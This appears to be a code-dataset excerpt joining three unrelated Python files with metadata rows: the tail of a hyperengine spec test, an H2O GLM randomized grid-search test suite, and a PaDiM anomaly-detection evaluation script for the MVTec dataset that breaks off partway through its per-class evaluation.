    # stats.norm.ppf is an instance method in python 2
    expected_normal_name = 'norm_gen' if six.PY2 else 'ppf'
    parsed = ParsedSpec(spec)
    self.assertEqual(parsed.size(), 5)
    self.assertTrue('a-b-c-d' in norm_node.name(), 'name=%s' % norm_node.name())
    self.assertTrue(expected_normal_name in norm_node.name(), 'name=%s' % norm_node.name())
    self.assertTrue('a-b-c-0' in choice_node.name(), 'name=%s' % choice_node.name())
    self.assertTrue('choice' in choice_node.name(), 'name=%s' % choice_node.name())
| hyperengine/tests/spec_test.py | 10,198 | ! /usr/bin/env python -*- coding: utf-8 -*- stats.norm.ppf is an instance method in python 2 | 92 | en | 0.584244 |
from __future__ import print_function
import sys
import random
import os
from builtins import range
import time
import json
sys.path.insert(1, "../../../")
import h2o
from tests import pyunit_utils
from h2o.estimators.glm import H2OGeneralizedLinearEstimator
from h2o.grid.grid_search import H2OGridSearch
class Test_glm_random_grid_search:
"""
This class is created to test the three stopping conditions for randomized gridsearch using
GLM Binomial family. The three stopping conditions are :
1. max_runtime_secs:
2. max_models:
3. metrics. We will be picking 2 stopping metrics to test this stopping condition with. One metric
will be optimized if it increases and the other one should be optimized if it decreases.
I have written 4 tests:
1. test1_glm_random_grid_search_model_number: this test will not put any stopping conditions
on randomized search. The purpose here is to make sure that randomized search will give us all possible
hyper-parameter combinations.
2. test2_glm_random_grid_search_max_model: this test the stopping condition of setting the max_model in
search criteria;
3. test3_glm_random_grid_search_max_runtime_secs: this test the stopping condition max_runtime_secs
in search criteria;
4. test4_glm_random_grid_search_metric: this test the stopping condition of using a metric which can be
increasing or decreasing.
"""
# parameters set by users, change with care
curr_time = str(round(time.time()))
# parameters denoting filenames of interested that store training/validation/test data sets in csv format
training1_filename = "smalldata/gridsearch/gaussian_training1_set.csv"
json_filename = "random_gridsearch_GLM_Gaussian_hyper_parameter_" + curr_time + ".json"
allowed_diff = 0.5 # error tolerance allowed
allowed_time_diff = 1e-1 # fraction of max_runtime_secs allowed for max run time stopping criteria
# System parameters, do not change. Dire consequences may follow if you do
current_dir = os.path.dirname(os.path.realpath(sys.argv[1])) # directory of this test file
train_row_count = 0 # training data row count, randomly generated later
train_col_count = 0 # training data column count, randomly generated later
max_int_val = 1000 # maximum size of random integer values
min_int_val = 0 # minimum size of random integer values
max_int_number = 3 # maximum number of integer random grid values to generate
max_real_val = 1 # maximum size of random float values
min_real_val = 0.0 # minimum size of random float values
max_real_number = 3 # maximum number of real grid values to generate
lambda_scale = 100 # scale lambda value to be from 0 to 100 instead of 0 to 1
max_runtime_scale = 3 # scale the max runtime to be different from 0 to 1
one_model_time = 0 # time taken to build one barebone model
possible_number_models = 0 # possible number of models built based on hyper-parameter specification
max_model_number = 0 # maximum number of models specified to test for stopping conditions, generated later
max_grid_runtime = 1 # maximum runtime value in seconds, 1 minute max
allowed_scaled_overtime = 1 # used to set max_allowed_runtime as allowed_scaled_overtime * total model run time
allowed_scaled_time = 1 # how much to scale back max time
allowed_scaled_model_number = 1.5 # used to set max_model_number as
# possible_number_models * allowed_scaled_model_number
max_stopping_rounds = 5 # maximum stopping rounds allowed to be used for early stopping metric
max_tolerance = 0.01 # maximum tolerance to be used for early stopping metric
family = 'gaussian' # set gaussian as default
test_name = "pyunit_glm_gaussian_gridsearch_randomdiscrete_large.py" # name of this test
sandbox_dir = "" # sandbox directory where we are going to save our failed test data sets
# store information about training/test data sets
x_indices = [] # store predictor indices in the data set
y_index = 0 # store response index in the data set
training1_data = [] # store training data sets
total_test_number = 5 # number of tests carried out
test_failed = 0 # count total number of tests that have failed
test_failed_array = [0]*total_test_number # denote test results for all tests run. 1 error, 0 pass
test_num = 0 # index representing which test is being run
# give the user opportunity to pre-assign hyper parameters for fixed values
hyper_params = {}
# parameters to be excluded from hyper parameter list even though they may be gridable
exclude_parameter_lists = ['tweedie_link_power', 'tweedie_variance_power'] # do not need these
# these are supposed to be gridable but not really
exclude_parameter_lists.extend(['fold_column', 'weights_column', 'offset_column'])
# these are excluded for extracting parameters to manually build H2O GLM models
exclude_parameter_lists.extend(['model_id'])
gridable_parameters = [] # store griddable parameter names
gridable_types = [] # store the corresponding griddable parameter types
gridable_defaults = [] # store the gridabble parameter default values
correct_model_number = 0 # count number of models built with correct hyper-parameter specification
nfolds = 5 # enable cross validation to test fold_assignment
def __init__(self, family):
    """
    Constructor: record the distribution family, then load the data and
    build the randomized-gridsearch hyper-parameter space.

    :param family: distribution family for tests (e.g. 'gaussian')
    :return: None
    """
    # FIX: the family argument was previously ignored; the class-attribute
    # default ('gaussian') masked the omission.  Store it so callers can
    # actually run tests for other families.
    self.family = family
    self.setup_data()         # load training data, set predictor/response indices
    self.setup_grid_params()  # build the gridsearch hyper-parameter dict
def setup_data(self):
    """
    Perform all data initializations:
    load the training data set and set the predictor indices and response
    column index (response is assumed to be the last column).
    """
    # clean out the sandbox directory first
    self.sandbox_dir = pyunit_utils.make_Rsandbox_dir(self.current_dir, self.test_name, True)
    # preload data sets
    self.training1_data = h2o.import_file(path=pyunit_utils.locate(self.training1_filename))
    # set data set indices for predictors and response
    self.y_index = self.training1_data.ncol-1
    self.x_indices = list(range(self.y_index))
    # save the training data files just in case the code crashed.
    pyunit_utils.remove_csv_files(self.current_dir, ".csv", action='copy', new_dir_path=self.sandbox_dir)
def setup_grid_params(self):
    """
    Set up the randomized gridsearch parameters that will be used later on:
    1. Grab all the parameters that are griddable and parameters used by GLM.
    2. Find the intersection of parameters that are both griddable and used by GLM.
    3. Several parameters used by GLM are denoted as griddable but actually are not.
       These have to be discovered manually and they are captured in
       self.exclude_parameter_lists.
    4. Generate the gridsearch hyper-parameters.  Numerical parameters are
       generated randomly; for enums, all values are included.

    :return: None
    """
    # build bare bone model to get all parameters
    model = H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds)
    model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
    self.one_model_time = pyunit_utils.find_grid_runtime([model])  # find model train time
    print("Time taken to build a base barebone model is {0}".format(self.one_model_time))
    # grab all gridable parameters and their types
    (self.gridable_parameters, self.gridable_types, self.gridable_defaults) = \
        pyunit_utils.get_gridables(model._model_json["parameters"])
    # give the user opportunity to pre-assign hyper parameters for fixed values
    self.hyper_params = {}
    self.hyper_params["fold_assignment"] = ['AUTO', 'Random', 'Modulo']
    self.hyper_params["missing_values_handling"] = ['MeanImputation', 'Skip']
    # randomly generate griddable parameters
    (self.hyper_params, self.gridable_parameters, self.gridable_types, self.gridable_defaults) = \
        pyunit_utils.gen_grid_search(model.full_parameters.keys(), self.hyper_params, self.exclude_parameter_lists,
                                     self.gridable_parameters, self.gridable_types, self.gridable_defaults,
                                     random.randint(1, self.max_int_number), self.max_int_val, self.min_int_val,
                                     random.randint(1, self.max_real_number), self.max_real_val, self.min_real_val)
    # scale the generated lambda values from [0, 1] up to [0, self.lambda_scale]
    if "lambda" in list(self.hyper_params):
        self.hyper_params["lambda"] = [self.lambda_scale * x for x in self.hyper_params["lambda"]]
    time_scale = self.max_runtime_scale * self.one_model_time
    # scale the generated max_runtime_secs values from [0, 1] up to [0, time_scale]
    if "max_runtime_secs" in list(self.hyper_params):
        self.hyper_params["max_runtime_secs"] = [time_scale * x for x in
                                                 self.hyper_params["max_runtime_secs"]]
    # number of possible models being built:
    self.possible_number_models = pyunit_utils.count_models(self.hyper_params)
    # save hyper-parameters in sandbox and current test directories.
    pyunit_utils.write_hyper_parameters_json(self.current_dir, self.sandbox_dir, self.json_filename,
                                             self.hyper_params)
def tear_down(self):
    """
    Clean up after the dynamic test completes.

    If any sub-test failed, copy the data sets and the hyper-parameter JSON
    into a Rsandbox directory so the failed run can be reproduced later;
    otherwise remove the sandbox since the data sets can be quite large.
    """
    if self.test_failed:  # some tests have failed. Need to save data sets for later re-runs
        # create Rsandbox directory to keep data sets and weight information
        self.sandbox_dir = pyunit_utils.make_Rsandbox_dir(self.current_dir, self.test_name, True)
        # Do not want to save all data sets. Only save data sets that are needed for failed tests
        pyunit_utils.move_files(self.sandbox_dir, self.training1_data_file, self.training1_filename)
        # write out the jenkins job info into log files.
        json_file = os.path.join(self.sandbox_dir, self.json_filename)
        # FIX: json.dump writes str, so the file must be opened in text mode;
        # 'wb' raises TypeError under Python 3.
        with open(json_file, 'w') as test_file:
            json.dump(self.hyper_params, test_file)
    else:  # all tests have passed. Delete sandbox if it was not wiped before
        pyunit_utils.make_Rsandbox_dir(self.current_dir, self.test_name, False)
def test1_glm_random_grid_search_model_number(self, metric_name):
    """
    Make sure the randomized gridsearch generates all models specified in the
    hyper-parameters when no stopping condition is given in the search criterion.

    :param metric_name: string to denote what grid search model should be sort by
        (NOTE(review): currently unused in this test's body — confirm intent)
    :return: None
    """
    print("*******************************************************************************************")
    print("test1_glm_random_grid_search_model_number for GLM " + self.family)
    h2o.cluster_info()
    # stopping condition: random discrete with stopping_rounds=0, i.e. build all models
    search_criteria = {'strategy': 'RandomDiscrete', "stopping_rounds": 0, "seed": round(time.time())}
    print("GLM Gaussian grid search_criteria: {0}".format(search_criteria))
    # fire off random grid-search
    random_grid_model = \
        H2OGridSearch(H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds),
                      hyper_params=self.hyper_params, search_criteria=search_criteria)
    random_grid_model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
    # the grid must contain exactly the number of models the hyper-space allows
    if not (len(random_grid_model) == self.possible_number_models):
        self.test_failed += 1
        self.test_failed_array[self.test_num] = 1
        print("test1_glm_random_grid_search_model_number for GLM: failed, number of models generated"
              "possible model number {0} and randomized gridsearch model number {1} are not "
              "equal.".format(self.possible_number_models, len(random_grid_model)))
    else:
        self.max_grid_runtime = pyunit_utils.find_grid_runtime(random_grid_model)  # time taken to build all models
    if self.test_failed_array[self.test_num] == 0:
        print("test1_glm_random_grid_search_model_number for GLM: passed!")
    self.test_num += 1
    sys.stdout.flush()
def test2_glm_random_grid_search_max_model(self):
    """
    Test the max_models stopping condition of the randomized gridsearch.
    max_models is randomly generated; if it exceeds the actual number of models
    the hyper-space allows, the grid search should build all models, otherwise
    it should build exactly max_models models.
    """
    print("*******************************************************************************************")
    print("test2_glm_random_grid_search_max_model for GLM " + self.family)
    h2o.cluster_info()
    # randomly pick a max_models limit, possibly above the reachable model count
    self.max_model_number = random.randint(1, int(self.allowed_scaled_model_number * self.possible_number_models))
    search_criteria = {'strategy': 'RandomDiscrete', 'max_models': self.max_model_number,
                       "seed": round(time.time())}
    print("GLM Gaussian grid search_criteria: {0}".format(search_criteria))
    print("Possible number of models built is {0}".format(self.possible_number_models))
    # fire off random grid-search
    grid_model = \
        H2OGridSearch(H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds),
                      hyper_params=self.hyper_params, search_criteria=search_criteria)
    grid_model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
    number_model_built = len(grid_model)  # count actual number of models built
    print("Maximum model limit is {0}. Number of models built is {1}".format(search_criteria["max_models"],
                                                                             number_model_built))
    if self.possible_number_models >= self.max_model_number:  # stopping condition restricts model number
        if not (number_model_built == self.max_model_number):
            print("test2_glm_random_grid_search_max_model: failed. Number of model built {0} "
                  "does not match stopping condition number{1}.".format(number_model_built, self.max_model_number))
            self.test_failed += 1
            self.test_failed_array[self.test_num] = 1
        else:
            print("test2_glm_random_grid_search_max_model for GLM: passed.")
    else:  # stopping condition is too loose: expect every possible model
        if not (number_model_built == self.possible_number_models):
            self.test_failed += 1
            self.test_failed_array[self.test_num] = 1
            print("test2_glm_random_grid_search_max_model: failed. Number of model built {0} does not equal "
                  "to possible model number {1}.".format(number_model_built, self.possible_number_models))
        else:
            print("test2_glm_random_grid_search_max_model for GLM: passed.")
    self.test_num += 1
    sys.stdout.flush()
def test3_glm_random_grid_search_max_runtime_secs(self):
    """
    Test the max_runtime_secs stopping criterion.  For each model built, the
    run_time field denotes the time in ms used to build the model.  We add up
    the run_time of all models and check it against max_runtime_secs.  Each
    algorithm checks its remaining time at a different granularity (GLM may
    check every 10 epochs, deeplearning after every epoch), so some inaccuracy
    in the actual run time is expected.  The test passes if the total runtime
    does not exceed max_runtime_secs by more than self.allowed_diff.

    :return: None
    """
    print("*******************************************************************************************")
    print("test3_glm_random_grid_search_max_runtime_secs for GLM " + self.family)
    h2o.cluster_info()
    # max_runtime_secs must come from search_criteria, not the hyper-space
    if "max_runtime_secs" in list(self.hyper_params):
        del self.hyper_params['max_runtime_secs']
        # number of possible models being built:
        self.possible_number_models = pyunit_utils.count_models(self.hyper_params)
    # pick a random runtime budget between one model's time and the full grid's time
    max_run_time_secs = random.uniform(self.one_model_time, self.allowed_scaled_time*self.max_grid_runtime)
    search_criteria = {'strategy': 'RandomDiscrete', 'max_runtime_secs': max_run_time_secs,
                       "seed": round(time.time())}
    # search_criteria = {'strategy': 'RandomDiscrete', 'max_runtime_secs': 1/1e8}
    print("GLM Gaussian grid search_criteria: {0}".format(search_criteria))
    # fire off random grid-search
    grid_model = \
        H2OGridSearch(H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds),
                      hyper_params=self.hyper_params, search_criteria=search_criteria)
    grid_model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
    actual_run_time_secs = pyunit_utils.find_grid_runtime(grid_model)
    print("Maximum time limit is {0}. Time taken to build all model is "
          "{1}".format(search_criteria["max_runtime_secs"], actual_run_time_secs))
    print("Maximum model number is {0}. Actual number of models built is {1}".format(self.possible_number_models,
                                                                                     len(grid_model)))
    if actual_run_time_secs <= search_criteria["max_runtime_secs"]*(1+self.allowed_diff):
        print("test3_glm_random_grid_search_max_runtime_secs: passed!")
        if len(grid_model) > self.possible_number_models:  # generated too many models, something is wrong
            self.test_failed += 1
            self.test_failed_array[self.test_num] = 1
            print("test3_glm_random_grid_search_max_runtime_secs: failed. Generated {0} models "
                  " which exceeds maximum possible model number {1}".format(len(grid_model),
                                                                            self.possible_number_models))
    elif len(grid_model) == 1:  # will always generate at least 1 model
        print("test3_glm_random_grid_search_max_runtime_secs: passed!")
    else:
        self.test_failed += 1
        self.test_failed_array[self.test_num] = 1
        print("test3_glm_random_grid_search_max_runtime_secs: failed. Model takes time {0}"
              " seconds which exceeds allowed time {1}".format(actual_run_time_secs,
                                                               max_run_time_secs*(1+self.allowed_diff)))
    self.test_num += 1
    sys.stdout.flush()
def test4_glm_random_grid_search_metric(self, metric_name, bigger_is_better):
    """
    Test the metric-based (early stopping) stopping condition.

    :param metric_name: metric used as the stopping condition
    :param bigger_is_better: True if a higher metric value indicates better model performance
    :return: None
    """
    print("*******************************************************************************************")
    print("test4_glm_random_grid_search_metric using " + metric_name + " for family " + self.family)
    h2o.cluster_info()
    search_criteria = {
        "strategy": "RandomDiscrete",
        "stopping_metric": metric_name,
        "stopping_tolerance": random.uniform(1e-8, self.max_tolerance),
        "stopping_rounds": random.randint(1, self.max_stopping_rounds),
        "seed": round(time.time())
    }
    print("GLM Gaussian grid search_criteria: {0}".format(search_criteria))
    # add max_runtime_secs back into hyper-parameters to limit model runtime.
    self.hyper_params["max_runtime_secs"] = [0.3]  # arbitrarily set to 0.3 second
    # fire off random grid-search
    grid_model = \
        H2OGridSearch(H2OGeneralizedLinearEstimator(family=self.family, nfolds=self.nfolds),
                      hyper_params=self.hyper_params, search_criteria=search_criteria)
    grid_model.train(x=self.x_indices, y=self.y_index, training_frame=self.training1_data)
    # bool indicating if randomized grid search has calculated the early stopping condition correctly
    stopped_correctly = \
        pyunit_utils.evaluate_metrics_stopping(grid_model.models, metric_name, bigger_is_better, search_criteria,
                                               self.possible_number_models)
    if stopped_correctly:
        print("test4_glm_random_grid_search_metric " + metric_name + ": passed. ")
    else:
        self.test_failed += 1
        self.test_failed_array[self.test_num] = 1
        print("test4_glm_random_grid_search_metric " + metric_name + ": failed. ")
    self.test_num += 1
def test_random_grid_search_for_glm():
    """
    Instantiate the test class and run all four randomized-gridsearch tests
    for the GLM Gaussian family.  Exits with status 1 if any test failed.

    :return: None
    """
    # randomize grid search for Gaussian
    test_glm_gaussian_random_grid = Test_glm_random_grid_search("gaussian")
    test_glm_gaussian_random_grid.test1_glm_random_grid_search_model_number("mse(xval=True)")  # this test must be run.
    test_glm_gaussian_random_grid.test2_glm_random_grid_search_max_model()
    test_glm_gaussian_random_grid.test3_glm_random_grid_search_max_runtime_secs()
    test_glm_gaussian_random_grid.test4_glm_random_grid_search_metric("MSE", False)
    # test_glm_gaussian_random_grid.test4_glm_random_grid_search_metric("r2", True)  # R2 was removed as a stopping metric
    # test_glm_gaussian_random_grid.tear_down()  # obsolete
    # exit with error if any tests have failed; otherwise clean up the saved JSON
    if test_glm_gaussian_random_grid.test_failed > 0:
        sys.exit(1)
    else:
        pyunit_utils.remove_files(os.path.join(test_glm_gaussian_random_grid.current_dir,
                                               test_glm_gaussian_random_grid.json_filename))
# standard h2o pyunit entry point: run standalone when executed directly,
# run inline when imported by the test harness
if __name__ == "__main__":
    pyunit_utils.standalone_test(test_random_grid_search_for_glm)
else:
    test_random_grid_search_for_glm()
| h2o-py/dynamic_tests/testdir_algos/glm/pyunit_glm_gaussian_gridsearch_randomdiscrete_large.py | 23,996 | This class is created to test the three stopping conditions for randomized gridsearch using
GLM Binomial family. The three stopping conditions are :
1. max_runtime_secs:
2. max_models:
3. metrics. We will be picking 2 stopping metrics to test this stopping condition with. One metric
will be optimized if it increases and the other one should be optimized if it decreases.
I have written 4 tests:
1. test1_glm_random_grid_search_model_number: this test will not put any stopping conditions
on randomized search. The purpose here is to make sure that randomized search will give us all possible
hyper-parameter combinations.
2. test2_glm_random_grid_search_max_model: this test the stopping condition of setting the max_model in
search criteria;
3. test3_glm_random_grid_search_max_runtime_secs: this test the stopping condition max_runtime_secs
in search criteria;
4. test4_glm_random_grid_search_metric: this test the stopping condition of using a metric which can be
increasing or decreasing.
Constructor.
:param family: distribution family for tests
:return: None
This function performs all initializations necessary:
load the data sets and set the training set indices and response column index
This function setup the randomized gridsearch parameters that will be used later on:
1. It will first try to grab all the parameters that are griddable and parameters used by GLM.
2. It will find the intersection of parameters that are both griddable and used by GLM.
3. There are several extra parameters that are used by GLM that are denoted as griddable but actually is not.
These parameters have to be discovered manually and they These are captured in self.exclude_parameter_lists.
4. We generate the gridsearch hyper-parameter. For numerical parameters, we will generate those randomly.
For enums, we will include all of them.
:return: None
This function performs teardown after the dynamic test is completed. If all tests
passed, it will delete all data sets generated since they can be quite large. It
will move the training/validation/test data sets into a Rsandbox directory so that
we can re-run the failed test.
This test is used to make sure the randomized gridsearch will generate all models specified in the
hyperparameters if no stopping condition is given in the search criterion.
:param metric_name: string to denote what grid search model should be sort by
:return: None
This test is used to test the stopping condition max_model_number in the randomized gridsearch. The
max_models parameter is randomly generated. If it is higher than the actual possible number of models
that can be generated with the current hyper-space parameters, randomized grid search should generate
all the models. Otherwise, grid search shall return a model that equals to the max_model setting.
This function will test the stopping criteria max_runtime_secs. For each model built, the field
run_time actually denote the time in ms used to build the model. We will add up the run_time from all
models and check against the stopping criteria max_runtime_secs. Since each model will check its run time
differently, there is some inaccuracies in the actual run time. For example, if we give a model 10 ms to
build. The GLM may check and see if it has used up all the time for every 10 epochs that it has run. On
the other hand, deeplearning may check the time it has spent after every epoch of training.
If we are able to restrict the runtime to not exceed the specified max_runtime_secs by a certain
percentage, we will consider the test a success.
:return: None
This function will test the last stopping condition using metrics.
:param metric_name: metric we want to use to test the last stopping condition
:param bigger_is_better: higher metric value indicates better model performance
:return: None
Create and instantiate classes, call test methods to test randomize grid search for GLM Gaussian
or Binomial families.
:return: None
parameters set by users, change with care parameters denoting filenames of interested that store training/validation/test data sets in csv format error tolerance allowed fraction of max_runtime_secs allowed for max run time stopping criteria System parameters, do not change. Dire consequences may follow if you do directory of this test file training data row count, randomly generated later training data column count, randomly generated later maximum size of random integer values minimum size of random integer values maximum number of integer random grid values to generate maximum size of random float values minimum size of random float values maximum number of real grid values to generate scale lambda value to be from 0 to 100 instead of 0 to 1 scale the max runtime to be different from 0 to 1 time taken to build one barebone model possible number of models built based on hyper-parameter specification maximum number of models specified to test for stopping conditions, generated later maximum runtime value in seconds, 1 minute max used to set max_allowed_runtime as allowed_scaled_overtime * total model run time how much to scale back max time used to set max_model_number as possible_number_models * allowed_scaled_model_number maximum stopping rounds allowed to be used for early stopping metric maximum tolerance to be used for early stopping metric set gaussian as default name of this test sandbox directory where we are going to save our failed test data sets store information about training/test data sets store predictor indices in the data set store response index in the data set store training data sets number of tests carried out count total number of tests that have failed denote test results for all tests run. 
1 error, 0 pass index representing which test is being run give the user opportunity to pre-assign hyper parameters for fixed values parameters to be excluded from hyper parameter list even though they may be gridable do not need these these are supposed to be gridable but not really these are excluded for extracting parameters to manually build H2O GLM models store griddable parameter names store the corresponding griddable parameter types store the gridabble parameter default values count number of models built with correct hyper-parameter specification enable cross validation to test fold_assignment setup_data training data setup_data grid hyper-parameters clean out the sandbox directory first preload data sets set data set indices for predictors and response save the training data files just in case the code crashed. build bare bone model to get all parameters find model train time grab all gridable parameters and its type give the user opportunity to pre-assign hyper parameters for fixed values randomly generate griddable parameters change the value of lambda parameters to be from 0 to self.lambda_scale instead of 0 to 1. change the value of runtime parameters to be from 0 to self.lambda_scale instead of 0 to 1. number of possible models being built: save hyper-parameters in sandbox and current test directories. some tests have failed. Need to save data sets for later re-runs create Rsandbox directory to keep data sets and weight information Do not want to save all data sets. Only save data sets that are needed for failed tests write out the jenkins job info into log files. all tests have passed. 
Delete sandbox if if was not wiped before setup_data our stopping condition here, random discrete and find all models fire off random grid-search compare number of models built from both gridsearch time taken to build all models setup_data our stopping condition here fire off random grid-search count actual number of models built stopping condition restricts model number stopping condition is too loose number of possible models being built: setup_data our stopping condition here search_criteria = {'strategy': 'RandomDiscrete', 'max_runtime_secs': 1/1e8} fire off random grid-search generate too many models, something is wrong will always generate 1 model add max_runtime_secs back into hyper-parameters to limit model runtime. arbitrarily set to 0.1 second fire off random grid-search bool indicating if randomized grid search has calculated the early stopping condition correctly randomize grid search for Gaussian this test must be run. test_glm_gaussian_random_grid.test4_glm_random_grid_search_metric("r2", True) R2 was removed as a stopping metric test_glm_gaussian_random_grid.tear_down() obsolete exit with error if any tests have failed | 8,494 | en | 0.817193 |
import random
from random import sample
import argparse
import numpy as np
import os
import pickle
from tqdm import tqdm
from collections import OrderedDict
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
from sklearn.metrics import precision_recall_curve
from sklearn.covariance import LedoitWolf
from scipy.spatial.distance import mahalanobis
from scipy.ndimage import gaussian_filter
from skimage import morphology
from skimage.segmentation import mark_boundaries
import matplotlib.pyplot as plt
import matplotlib
import torch
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision.models import wide_resnet50_2, resnet18
import datasets.mvtec as mvtec
# device setup: prefer GPU when available, otherwise fall back to CPU
use_cuda = torch.cuda.is_available()
device = torch.device('cuda' if use_cuda else 'cpu')
def parse_args():
    """Parse command-line options for the PaDiM MVTec evaluation script.

    Options: --data_path (MVTec dataset root), --save_path (output
    directory), --arch (backbone: resnet18 or wide_resnet50_2).
    """
    cli = argparse.ArgumentParser('PaDiM')
    cli.add_argument('--data_path', type=str,
                     default='D:/dataset/mvtec_anomaly_detection')
    cli.add_argument('--save_path', type=str, default='./mvtec_result')
    cli.add_argument('--arch', type=str,
                     choices=['resnet18', 'wide_resnet50_2'],
                     default='wide_resnet50_2')
    return cli.parse_args()
def main():
    """Run PaDiM anomaly detection over all MVTec classes.

    For each class: fit a per-position multivariate Gaussian over CNN
    embeddings of defect-free training images, score test images by
    Mahalanobis distance, and report image- and pixel-level ROC AUC.
    Results (cached features, ROC curve figure) are written under
    args.save_path.
    """
    args = parse_args()

    # load backbone; t_d = total concatenated embedding channels,
    # d = number of randomly retained channels (per the PaDiM paper setup)
    if args.arch == 'resnet18':
        model = resnet18(pretrained=True, progress=True)
        t_d = 448
        d = 100
    elif args.arch == 'wide_resnet50_2':
        model = wide_resnet50_2(pretrained=True, progress=True)
        t_d = 1792
        d = 550
    model.to(device)
    model.eval()
    random.seed(1024)
    torch.manual_seed(1024)
    if use_cuda:
        torch.cuda.manual_seed_all(1024)

    # fixed random channel selection, shared by train and test embeddings
    idx = torch.tensor(sample(range(0, t_d), d))

    # capture intermediate layer outputs via forward hooks
    outputs = []

    def hook(module, input, output):
        outputs.append(output)

    model.layer1[-1].register_forward_hook(hook)
    model.layer2[-1].register_forward_hook(hook)
    model.layer3[-1].register_forward_hook(hook)

    os.makedirs(os.path.join(args.save_path, 'temp_%s' % args.arch), exist_ok=True)
    # FIX: fig / fig_img_rocauc / fig_pixel_rocauc are used below (ROC
    # plotting, titles, legends, savefig); the original had this setup
    # commented out, which raised NameError at plot time.
    fig, ax = plt.subplots(1, 2, figsize=(20, 10))
    fig_img_rocauc = ax[0]
    fig_pixel_rocauc = ax[1]

    total_roc_auc = []
    total_pixel_roc_auc = []

    for class_name in mvtec.CLASS_NAMES:

        train_dataset = mvtec.MVTecDataset(args.data_path, class_name=class_name, is_train=True)
        train_dataloader = DataLoader(train_dataset, batch_size=32, pin_memory=True)
        test_dataset = mvtec.MVTecDataset(args.data_path, class_name=class_name, is_train=False)
        test_dataloader = DataLoader(test_dataset, batch_size=32, pin_memory=True)

        train_outputs = OrderedDict([('layer1', []), ('layer2', []), ('layer3', [])])
        test_outputs = OrderedDict([('layer1', []), ('layer2', []), ('layer3', [])])

        # extract train set features (cached on disk per class/arch)
        train_feature_filepath = os.path.join(args.save_path, 'temp_%s' % args.arch, 'train_%s.pkl' % class_name)
        if not os.path.exists(train_feature_filepath):
            for (x, _, _) in tqdm(train_dataloader, '| feature extraction | train | %s |' % class_name):
                # model prediction (we only need the hooked activations)
                with torch.no_grad():
                    _ = model(x.to(device))
                # get intermediate layer outputs
                for k, v in zip(train_outputs.keys(), outputs):
                    train_outputs[k].append(v.cpu().detach())
                # reset hook outputs for the next batch
                outputs = []
            for k, v in train_outputs.items():
                train_outputs[k] = torch.cat(v, 0)

            # concatenate embeddings from the three layers at layer1 resolution
            embedding_vectors = train_outputs['layer1']
            for layer_name in ['layer2', 'layer3']:
                embedding_vectors = embedding_concat(embedding_vectors, train_outputs[layer_name])

            # randomly select d dimensions
            embedding_vectors = torch.index_select(embedding_vectors, 1, idx)
            # fit a multivariate Gaussian per spatial position
            B, C, H, W = embedding_vectors.size()
            embedding_vectors = embedding_vectors.view(B, C, H * W)
            mean = torch.mean(embedding_vectors, dim=0).numpy()
            cov = torch.zeros(C, C, H * W).numpy()
            I = np.identity(C)
            for i in range(H * W):
                # cov[:, :, i] = LedoitWolf().fit(embedding_vectors[:, :, i].numpy()).covariance_
                # 0.01*I regularization keeps the covariance invertible
                cov[:, :, i] = np.cov(embedding_vectors[:, :, i].numpy(), rowvar=False) + 0.01 * I
            # save learned distribution
            train_outputs = [mean, cov]
            with open(train_feature_filepath, 'wb') as f:
                pickle.dump(train_outputs, f)
        else:
            print('load train set feature from: %s' % train_feature_filepath)
            with open(train_feature_filepath, 'rb') as f:
                train_outputs = pickle.load(f)

        gt_list = []
        gt_mask_list = []
        test_imgs = []

        # extract test set features
        for (x, y, mask) in tqdm(test_dataloader, '| feature extraction | test | %s |' % class_name):
            test_imgs.extend(x.cpu().detach().numpy())
            gt_list.extend(y.cpu().detach().numpy())
            gt_mask_list.extend(mask.cpu().detach().numpy())
            # model prediction
            with torch.no_grad():
                _ = model(x.to(device))
            # get intermediate layer outputs
            for k, v in zip(test_outputs.keys(), outputs):
                test_outputs[k].append(v.cpu().detach())
            # reset hook outputs for the next batch
            outputs = []
        for k, v in test_outputs.items():
            test_outputs[k] = torch.cat(v, 0)

        # concatenate embeddings from the three layers at layer1 resolution
        embedding_vectors = test_outputs['layer1']
        for layer_name in ['layer2', 'layer3']:
            embedding_vectors = embedding_concat(embedding_vectors, test_outputs[layer_name])

        # randomly select d dimensions
        embedding_vectors = torch.index_select(embedding_vectors, 1, idx)

        # Mahalanobis distance of each test embedding to the per-position Gaussian
        B, C, H, W = embedding_vectors.size()
        embedding_vectors = embedding_vectors.view(B, C, H * W).numpy()
        dist_list = []
        for i in range(H * W):
            mean = train_outputs[0][:, i]
            conv_inv = np.linalg.inv(train_outputs[1][:, :, i])
            dist = [mahalanobis(sample[:, i], mean, conv_inv) for sample in embedding_vectors]
            dist_list.append(dist)

        dist_list = np.array(dist_list).transpose(1, 0).reshape(B, H, W)

        # upsample distance maps to input resolution
        # NOTE(review): x here is the last test batch; assumes all images
        # share the same spatial size — confirm against the dataset.
        dist_list = torch.tensor(dist_list)
        score_map = F.interpolate(dist_list.unsqueeze(1), size=x.size(2), mode='bilinear',
                                  align_corners=False).squeeze().numpy()

        # apply gaussian smoothing on the score map
        for i in range(score_map.shape[0]):
            score_map[i] = gaussian_filter(score_map[i], sigma=4)

        # min-max normalize scores to [0, 1]
        max_score = score_map.max()
        min_score = score_map.min()
        scores = (score_map - min_score) / (max_score - min_score)

        # calculate image-level ROC AUC score (image score = max pixel score)
        img_scores = scores.reshape(scores.shape[0], -1).max(axis=1)
        gt_list = np.asarray(gt_list)
        fpr, tpr, _ = roc_curve(gt_list, img_scores)
        img_roc_auc = roc_auc_score(gt_list, img_scores)
        total_roc_auc.append(img_roc_auc)
        print('image ROCAUC: %.3f' % (img_roc_auc))
        fig_img_rocauc.plot(fpr, tpr, label='%s img_ROCAUC: %.3f' % (class_name, img_roc_auc))

        # get optimal segmentation threshold via F1 on the PR curve
        gt_mask = np.asarray(gt_mask_list)
        precision, recall, thresholds = precision_recall_curve(gt_mask.flatten(), scores.flatten())
        a = 2 * precision * recall
        b = precision + recall
        f1 = np.divide(a, b, out=np.zeros_like(a), where=b != 0)
        threshold = thresholds[np.argmax(f1)]

